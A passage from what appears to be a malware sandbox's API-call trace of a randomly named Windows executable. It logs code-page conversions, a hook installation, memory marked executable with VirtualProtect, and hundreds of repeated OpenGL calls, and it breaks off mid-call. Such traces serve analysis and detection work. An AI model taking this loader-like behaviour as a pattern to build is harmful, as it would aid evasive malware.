¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x01", lpUsedDefaultChar=0x0) returned 256 [0150.799] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fda0, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0150.800] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fda0, cbMultiByte=256, lpWideCharStr=0x19f700, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ⫼GĀ") returned 256 [0150.800] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ⫼GĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0150.800] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ⫼GĀ", cchSrc=256, lpDestStr=0x19f500, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ⫼GĀ") returned 256 [0150.800] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x220, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ⫼GĀ", cchWideChar=256, lpMultiByteStr=0x19fba0, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x01", lpUsedDefaultChar=0x0) returned 256 [0150.800] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x471794, nSize=0x104 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\gIkAOpZB.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\gikaopzb.exe")) returned 0x22 [0150.806] HeapFree (in: hHeap=0x9e0000, dwFlags=0x0, lpMem=0x9e4d48 | out: hHeap=0x9e0000) returned 1 [0150.807] GetModuleHandleA (lpModuleName="KERNEL32") returned 0x74a40000 [0150.807] GetProcAddress (hModule=0x74a40000, lpProcName="IsProcessorFeaturePresent") returned 0x74a59bf0 [0150.807] IsProcessorFeaturePresent (ProcessorFeature=0x0) returned 0 [0150.807] RtlAllocateHeap (HeapHandle=0x9e0000, Flags=0x8, Size=0x800) returned 0x9e4d48 [0150.807] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x43ba8c) returned 0x0 [0150.809] GlobalLock (hMem=0x960004) returned 0x76f330 [0150.809] LocalAlloc (uFlags=0x40, uBytes=0x118) returned 0x7731d0 [0150.809] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x7a1bb8 [0150.809] LocalAlloc (uFlags=0x0, uBytes=0x8) returned 0x76ee88 [0150.809] GetVersion () returned 0x23f00206 [0150.809] LocalAlloc (uFlags=0x40, uBytes=0x1074) returned 0x7a2880 [0150.809] GetACP () returned 0x4e4 [0150.810] GetCursorPos (in: lpPoint=0x46f53c | out: lpPoint=0x46f53c*(x=785, y=850)) returned 1 [0150.810] LocalAlloc (uFlags=0x40, uBytes=0x3c) returned 0x772e80 [0150.810] LocalReAlloc (hMem=0x76ee88, uBytes=0xc, uFlags=0x2) returned 0x774778 [0150.810] GetCurrentThread () returned 0xfffffffe [0150.810] GetCurrentThreadId () returned 0xde8 [0150.810] RegisterClipboardFormatA (lpszFormat="commctrl_DragListMsg") returned 0xc15a [0150.811] GetVersion () returned 0x23f00206 [0150.811] GetProcessVersion (ProcessId=0x0) returned 0x40000 [0150.812] GetSystemMetrics (nIndex=11) returned 32 [0152.984] GetSystemMetrics (nIndex=12) returned 32 [0152.984] GetSystemMetrics (nIndex=2) returned 17 [0152.984] GetSystemMetrics (nIndex=3) returned 17 [0152.984] GetDC (hWnd=0x0) returned 0xa0100d0 [0152.984] GetDeviceCaps (hdc=0xa0100d0, index=88) returned 96 [0152.984] GetDeviceCaps (hdc=0xa0100d0, index=90) returned 96 [0152.984] ReleaseDC (hWnd=0x0, hDC=0xa0100d0) returned 1 [0152.984] GetSysColor (nIndex=15) returned 0xf0f0f0 [0152.984] GetSysColor (nIndex=16) returned 0xa0a0a0 [0152.984] GetSysColor (nIndex=20) returned 0xffffff [0152.984] GetSysColor (nIndex=18) returned 0x0 [0152.984] GetSysColor (nIndex=6) returned 0x646464 [0152.984] GetSysColorBrush (nIndex=15) returned 0x1100074 [0152.984] GetSysColorBrush (nIndex=6) returned 0x110007c [0152.985] LoadCursorA (hInstance=0x0, lpCursorName=0x7f02) returned 0x10007 [0152.985] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0152.985] GetOEMCP () returned 0x1b5 [0152.985] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x19fed0 | out: lpCPInfo=0x19fed0) returned 1 [0152.985] GetVersion () returned 0x23f00206 [0152.985] GetVersion () returned 0x23f00206 [0152.985] GetVersion () returned 0x23f00206 [0152.985] RegisterClipboardFormatA (lpszFormat="Native") returned 0xc004 [0152.985] RegisterClipboardFormatA (lpszFormat="OwnerLink") returned 0xc003 [0152.985] RegisterClipboardFormatA (lpszFormat="ObjectLink") returned 0xc002 [0152.985] RegisterClipboardFormatA (lpszFormat="Embedded Object") returned 0xc00a [0152.985] RegisterClipboardFormatA (lpszFormat="Embed Source") returned 0xc00b [0152.985] RegisterClipboardFormatA (lpszFormat="Link Source") returned 0xc00d [0152.985] RegisterClipboardFormatA (lpszFormat="Object Descriptor") returned 0xc00e [0152.985] RegisterClipboardFormatA (lpszFormat="Link Source Descriptor") returned 0xc00f [0152.985] RegisterClipboardFormatA (lpszFormat="FileName") returned 0xc006 [0152.986] RegisterClipboardFormatA (lpszFormat="FileNameW") returned 0xc007 [0152.986] RegisterClipboardFormatA (lpszFormat="Rich Text Format") returned 0xc0da [0152.986] RegisterClipboardFormatA (lpszFormat="RichEdit Text and Objects") returned 0xc0e3 [0152.986] GetStartupInfoA (in: lpStartupInfo=0x19ff24 | out: lpStartupInfo=0x19ff24*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\RDhJ0CNFevzX\\gIkAOpZB.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x30c, hStdOutput=0x318, hStdError=0x320)) [0152.986] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0152.986] SetErrorMode (uMode=0x0) returned 0x1 [0152.986] SetErrorMode (uMode=0x8001) returned 0x0 [0152.986] GetModuleFileNameA (in: hModule=0x400000, lpFilename=0x19fcac, nSize=0x104 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\gIkAOpZB.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\gikaopzb.exe")) returned 0x22 [0152.986] lstrcpynA (in: lpString1=0x19fdb0, lpString2="gIkAOpZB", iMaxLength=260 | out: lpString1="gIkAOpZB") returned="gIkAOpZB" [0152.987] LoadStringA (in: hInstance=0x400000, uID=0xe000, lpBuffer=0x19fbac, cchBufferMax=256 | out: lpBuffer="") returned 0x0 [0152.987] lstrcpyA (in: lpString1=0x19fcca, lpString2=".HLP" | out: lpString1=".HLP") returned=".HLP" [0152.987] lstrcatA (in: lpString1="gIkAOpZB", lpString2=".INI" | out: lpString1="gIkAOpZB.INI") returned="gIkAOpZB.INI" [0152.987] GetCurrentThreadId () returned 0xde8 [0152.987] SetWindowsHookExA (idHook=-1, lpfn=0x448b6c, hmod=0x0, dwThreadId=0xde8) returned 0x1a0265 [0152.987] LocalAlloc (uFlags=0x40, uBytes=0x30) returned 0x773cc0 [0152.987] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x76ee88 [0152.987] LocalReAlloc (hMem=0x774778, uBytes=0x10, uFlags=0x2) returned 0x774778 [0152.988] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x768a08 [0166.335] VirtualProtect (in: lpAddress=0x4569a8, dwSize=0x8000, flNewProtect=0x40, lpflOldProtect=0x19febc | out: lpflOldProtect=0x19febc*=0x2) returned 1 [0166.336] glGenTextures () returned 0x0 [0166.336] glBindTexture () returned 0x0 [0166.337] glTexParameteri () returned 0x0 [0166.337] glTexParameteri () returned 0x0 [0166.337] glTexParameteri () returned 0x0 [0166.337] glTexParameteri () returned 0x0 [0166.340] glTexImage2D () returned 0x0 [0166.340] glBindTexture () returned 0x0 [0166.340] glBegin () returned 0x0 [0166.340] glArrayElement () returned 0x0 [0166.340] glGenTextures () returned 0x0 [0166.340] glBindTexture () returned 0x0 [0166.340] glTexParameteri () returned 0x0 [0166.340] glTexParameteri () returned 0x0 [0166.340] glTexParameteri () returned 0x0 [0166.340] glTexParameteri () returned 0x0 [0166.340] glTexImage2D () returned 0x0 [0166.340] glBindTexture () returned 0x0 [0166.340] glBegin () returned 0x0 [0166.340] glArrayElement () returned 0x0 [0166.340] glGenTextures () returned 0x0 [0166.340] glBindTexture () returned 0x0 [0166.340] glTexParameteri () returned 0x0 [0166.340] glTexParameteri () returned 0x0 [0166.340] glTexParameteri () returned 0x0 [0166.340] glTexParameteri () returned 0x0 [0166.340] glTexImage2D () returned 0x0 [0166.340] glBindTexture () returned 0x0 [0166.340] glBegin () returned 0x0 [0166.340] glArrayElement () returned 0x0 [0166.341] glGenTextures () returned 0x0 [0166.341] glBindTexture () returned 0x0 [0166.341] glTexParameteri () returned 0x0 [0166.341] glTexParameteri () returned 0x0 [0166.341] glTexParameteri () returned 0x0 [0166.341] glTexParameteri () returned 0x0 [0166.341] glTexImage2D () returned 0x0 [0166.341] glBindTexture () returned 0x0 [0166.341] glBegin () returned 0x0 [0166.341] glArrayElement () returned 0x0 [0166.341] glGenTextures () returned 0x0 [0166.341] glBindTexture () returned 0x0 [0166.341] glTexParameteri () returned 0x0 [0166.341] glTexParameteri () returned 0x0 [0166.341] glTexParameteri () returned 0x0 [0166.341] glTexParameteri () returned 0x0 [0166.341] glTexImage2D () returned 0x0 [0166.341] glBindTexture () returned 0x0 [0166.341] glBegin () returned 0x0 [0166.341] glArrayElement () returned 0x0 [0166.341] glGenTextures () returned 0x0 [0166.341] glBindTexture () returned 0x0 [0166.341] glTexParameteri () returned 0x0 [0166.341] glTexParameteri () returned 0x0 [0166.341] glTexParameteri () returned 0x0 [0166.341] glTexParameteri () returned 0x0 [0166.341] glTexImage2D () returned 0x0 [0166.341] glBindTexture () returned 0x0 [0166.341] glBegin () returned 0x0 [0166.341] glArrayElement () returned 0x0 [0166.341] glGenTextures () returned 0x0 [0166.341] glBindTexture () returned 0x0 [0166.341] glTexParameteri () returned 0x0 [0166.342] glTexParameteri () returned 0x0 [0166.342] glTexParameteri () returned 0x0 [0166.342] glTexParameteri () returned 0x0 [0166.342] glTexImage2D () returned 0x0 [0166.342] glBindTexture () returned 0x0 [0166.342] glBegin () returned 0x0 [0166.342] glArrayElement () returned 0x0 [0166.342] glGenTextures () returned 0x0 [0166.342] glBindTexture () returned 0x0 [0166.342] glTexParameteri () returned 0x0 [0166.342] glTexParameteri () returned 0x0 [0166.342] glTexParameteri () returned 0x0 [0166.342] glTexParameteri () returned 0x0 [0166.342] glTexImage2D () returned 0x0 [0166.342] glBindTexture () returned 0x0 [0166.342] glBegin () returned 0x0 [0166.342] glArrayElement () returned 0x0 [0166.342] glGenTextures () returned 0x0 [0166.342] glBindTexture () returned 0x0 [0166.342] glTexParameteri () returned 0x0 [0166.342] glTexParameteri () returned 0x0 [0166.342] glTexParameteri () returned 0x0 [0166.342] glTexParameteri () returned 0x0 [0166.342] glTexImage2D () returned 0x0 [0166.342] glBindTexture () returned 0x0 [0166.342] glBegin () returned 0x0 [0166.342] glArrayElement () returned 0x0 [0166.342] glGenTextures () returned 0x0 [0166.342] glBindTexture () returned 0x0 [0166.342] glTexParameteri () returned 0x0 [0166.342] glTexParameteri () returned 0x0 [0166.342] glTexParameteri () returned 0x0 [0166.342] glTexParameteri () returned 0x0 [0166.342] glTexImage2D () returned 0x0 [0166.342] glBindTexture () returned 0x0 [0166.342] glBegin () returned 0x0 [0166.343] glArrayElement () returned 0x0 [0166.343] glGenTextures () returned 0x0 [0166.343] glBindTexture () returned 0x0 [0166.343] glTexParameteri () returned 0x0 [0166.343] glTexParameteri () returned 0x0 [0166.343] glTexParameteri () returned 0x0 [0166.343] glTexParameteri () returned 0x0 [0166.343] glTexImage2D () returned 0x0 [0166.343] glBindTexture () returned 0x0 [0166.343] glBegin () returned 0x0 [0166.343] glArrayElement () returned 0x0 [0166.343] glGenTextures () returned 0x0 [0166.343] glBindTexture () returned 0x0 [0166.343] glTexParameteri () returned 0x0 [0166.343] glTexParameteri () returned 0x0 [0166.343] glTexParameteri () returned 0x0 [0166.343] glTexParameteri () returned 0x0 [0166.343] glTexImage2D () returned 0x0 [0166.343] glBindTexture () returned 0x0 [0166.343] glBegin () returned 0x0 [0166.343] glArrayElement () returned 0x0 [0166.343] glGenTextures () returned 0x0 [0166.343] glBindTexture () returned 0x0 [0166.343] glTexParameteri () returned 0x0 [0166.343] glTexParameteri () returned 0x0 [0166.343] glTexParameteri () returned 0x0 [0166.343] glTexParameteri () returned 0x0 [0166.343] glTexImage2D () returned 0x0 [0166.343] glBindTexture () returned 0x0 [0166.343] glBegin () returned 0x0 [0166.343] glArrayElement () returned 0x0 [0166.343] glGenTextures () returned 0x0 [0166.343] glBindTexture () returned 0x0 [0166.343] glTexParameteri () returned 0x0 [0166.343] glTexParameteri () returned 0x0 [0166.344] glTexParameteri () returned 0x0 [0166.344] glTexParameteri () returned 0x0 [0166.344] glTexImage2D () returned 0x0 [0166.344] glBindTexture () returned 0x0 [0166.344] glBegin () returned 0x0 [0166.344] glArrayElement () returned 0x0 [0166.344] glGenTextures () returned 0x0 [0166.344] glBindTexture () returned 0x0 [0166.344] glTexParameteri () returned 0x0 [0166.344] glTexParameteri () returned 0x0 [0166.344] glTexParameteri () returned 0x0 [0166.344] glTexParameteri () returned 0x0 [0166.344] glTexImage2D () returned 0x0 [0166.344] glBindTexture () returned 0x0 [0166.344] glBegin () returned 0x0 [0166.344] glArrayElement () returned 0x0 [0166.344] glGenTextures () returned 0x0 [0166.344] glBindTexture () returned 0x0 [0166.344] glTexParameteri () returned 0x0 [0166.344] glTexParameteri () returned 0x0 [0166.344] glTexParameteri () returned 0x0 [0166.344] glTexParameteri () returned 0x0 [0166.344] glTexImage2D () returned 0x0 [0166.344] glBindTexture () returned 0x0 [0166.344] glBegin () returned 0x0 [0166.344] glArrayElement () returned 0x0 [0166.344] glGenTextures () returned 0x0 [0166.344] glBindTexture () returned 0x0 [0166.344] glTexParameteri () returned 0x0 [0166.344] glTexParameteri () returned 0x0 [0166.344] glTexParameteri () returned 0x0 [0166.344] glTexParameteri () returned 0x0 [0166.344] glTexImage2D () returned 0x0 [0166.344] glBindTexture () returned 0x0 [0166.344] glBegin () returned 0x0 [0166.345] glArrayElement () returned 0x0 [0166.345] glGenTextures () returned 0x0 [0166.345] glBindTexture () returned 0x0 [0166.345] glTexParameteri () returned 0x0 [0166.345] glTexParameteri () returned 0x0 [0166.345] glTexParameteri () returned 0x0 [0166.345] glTexParameteri () returned 0x0 [0166.345] glTexImage2D () returned 0x0 [0166.345] glBindTexture () returned 0x0 [0166.345] glBegin () returned 0x0 [0166.345] glArrayElement () returned 0x0 [0166.345] glGenTextures () returned 0x0 [0166.345] glBindTexture () returned 0x0 [0166.345] glTexParameteri () returned 0x0 [0166.345] glTexParameteri () returned 0x0 [0166.345] glTexParameteri () returned 0x0 [0166.345] glTexParameteri () returned 0x0 [0166.345] glTexImage2D () returned 0x0 [0166.345] glBindTexture () returned 0x0 [0166.345] glBegin () returned 0x0 [0166.345] glArrayElement () returned 0x0 [0166.345] glGenTextures () returned 0x0 [0166.345] glBindTexture () returned 0x0 [0166.345] glTexParameteri () returned 0x0 [0166.345] glTexParameteri () returned 0x0 [0166.345] glTexParameteri () returned 0x0 [0166.345] glTexParameteri () returned 0x0 [0166.345] glTexImage2D () returned 0x0 [0166.345] glBindTexture () returned 0x0 [0166.345] glBegin () returned 0x0 [0166.345] glArrayElement () returned 0x0 [0166.345] glGenTextures () returned 0x0 [0166.345] glBindTexture () returned 0x0 [0166.345] glTexParameteri () returned 0x0 [0166.345] glTexParameteri () returned 0x0 [0166.345] glTexParameteri () returned 0x0 [0166.346] glTexParameteri () returned 0x0 [0166.346] glTexImage2D () returned 0x0 [0166.346] glBindTexture () returned 0x0 [0166.346] glBegin () returned 0x0 [0166.346] glArrayElement () returned 0x0 [0166.346] glGenTextures () returned 0x0 [0166.346] glBindTexture () returned 0x0 [0166.346] glTexParameteri () returned 0x0 [0166.346] glTexParameteri () returned 0x0 [0166.346] glTexParameteri () returned 0x0 [0166.346] glTexParameteri () returned 0x0 [0166.346] glTexImage2D () returned 0x0 [0166.346] glBindTexture () returned 0x0 [0166.346] glBegin () returned 0x0 [0166.346] glArrayElement () returned 0x0 [0166.346] glGenTextures () returned 0x0 [0166.346] glBindTexture () returned 0x0 [0166.346] glTexParameteri () returned 0x0 [0166.346] glTexParameteri () returned 0x0 [0166.346] glTexParameteri () returned 0x0 [0166.346] glTexParameteri () returned 0x0 [0166.346] glTexImage2D () returned 0x0 [0166.346] glBindTexture () returned 0x0 [0166.346] glBegin () returned 0x0 [0166.346] glArrayElement () returned 0x0 [0166.346] glGenTextures () returned 0x0 [0166.346] glBindTexture () returned 0x0 [0166.346] glTexParameteri () returned 0x0 [0166.346] glTexParameteri () returned 0x0 [0166.346] glTexParameteri () returned 0x0 [0166.346] glTexParameteri () returned 0x0 [0166.346] glTexImage2D () returned 0x0 [0166.346] glBindTexture () returned 0x0 [0166.346] glBegin () returned 0x0 [0166.346] glArrayElement () returned 0x0 [0166.347] glGenTextures () returned 0x0 [0166.347] glBindTexture () returned 0x0 [0166.347] glTexParameteri () returned 0x0 [0166.347] glTexParameteri () returned 0x0 [0166.347] glTexParameteri () returned 0x0 [0166.347] glTexParameteri () returned 0x0 [0166.347] glTexImage2D () returned 0x0 [0166.347] glBindTexture () returned 0x0 [0166.347] glBegin () returned 0x0 [0166.347] glArrayElement () returned 0x0 [0166.347] glGenTextures () returned 0x0 [0166.347] glBindTexture () returned 0x0 [0166.347] glTexParameteri () returned 0x0 [0166.347] glTexParameteri () returned 0x0 [0166.347] glTexParameteri () returned 0x0 [0166.347] glTexParameteri () returned 0x0 [0166.347] glTexImage2D () returned 0x0 [0166.347] glBindTexture () returned 0x0 [0166.347] glBegin () returned 0x0 [0166.347] glArrayElement () returned 0x0 [0166.347] glGenTextures () returned 0x0 [0166.347] glBindTexture () returned 0x0 [0166.347] glTexParameteri () returned 0x0 [0166.347] glTexParameteri () returned 0x0 [0166.347] glTexParameteri () returned 0x0 [0166.347] glTexParameteri () returned 0x0 [0166.347] glTexImage2D () returned 0x0 [0166.347] glBindTexture () returned 0x0 [0166.347] glBegin () returned 0x0 [0166.347] glArrayElement () returned 0x0 [0166.347] glGenTextures () returned 0x0 [0166.347] glBindTexture () returned 0x0 [0166.347] glTexParameteri () returned 0x0 [0166.347] glTexParameteri () returned 0x0 [0166.348] glTexParameteri () returned 0x0 [0166.348] glTexParameteri () returned 0x0 [0166.348] glTexImage2D () returned 0x0 [0166.348] glBindTexture () returned 0x0 [0166.348] glBegin () returned 0x0 [0166.348] glArrayElement () returned 0x0 [0166.348] glGenTextures () returned 0x0 [0166.348] glBindTexture () returned 0x0 [0166.348] glTexParameteri () returned 0x0 [0166.348] glTexParameteri () returned 0x0 [0166.348] glTexParameteri () returned 0x0 [0166.348] glTexParameteri () returned 0x0 [0166.348] glTexImage2D () returned 0x0 [0166.348] glBindTexture () returned 0x0 [0166.348] glBegin () returned 0x0 [0166.348] glArrayElement () returned 0x0 [0166.348] glGenTextures () returned 0x0 [0166.348] glBindTexture () returned 0x0 [0166.348] glTexParameteri () returned 0x0 [0166.348] glTexParameteri () returned 0x0 [0166.348] glTexParameteri () returned 0x0 [0166.348] glTexParameteri () returned 0x0 [0166.348] glTexImage2D () returned 0x0 [0166.348] glBindTexture () returned 0x0 [0166.348] glBegin () returned 0x0 [0166.348] glArrayElement () returned 0x0 [0166.348] glGenTextures () returned 0x0 [0166.348] glBindTexture () returned 0x0 [0166.348] glTexParameteri () returned 0x0 [0166.348] glTexParameteri () returned 0x0 [0166.348] glTexParameteri () returned 0x0 [0166.348] glTexParameteri () returned 0x0 [0166.348] glTexImage2D () returned 0x0 [0166.348] glBindTexture () returned 0x0 [0166.349] glBegin () returned 0x0 [0166.349] glArrayElement () returned 0x0 [0166.349] glGenTextures () returned 0x0 [0166.349] glBindTexture () returned 0x0 [0166.349] glTexParameteri () returned 0x0 [0166.349] glTexParameteri () returned 0x0 [0166.349] glTexParameteri () returned 0x0 [0166.349] glTexParameteri () returned 0x0 [0166.349] glTexImage2D () returned 0x0 [0166.349] glBindTexture () returned 0x0 [0166.349] glBegin () returned 0x0 [0166.349] glArrayElement () returned 0x0 [0166.349] glGenTextures () returned 0x0 [0166.349] glBindTexture () returned 0x0 [0166.349] glTexParameteri () returned 0x0 [0166.349] glTexParameteri () returned 0x0 [0166.349] glTexParameteri () returned 0x0 [0166.349] glTexParameteri () returned 0x0 [0166.349] glTexImage2D () returned 0x0 [0166.349] glBindTexture () returned 0x0 [0166.349] glBegin () returned 0x0 [0166.349] glArrayElement () returned 0x0 [0166.349] glGenTextures 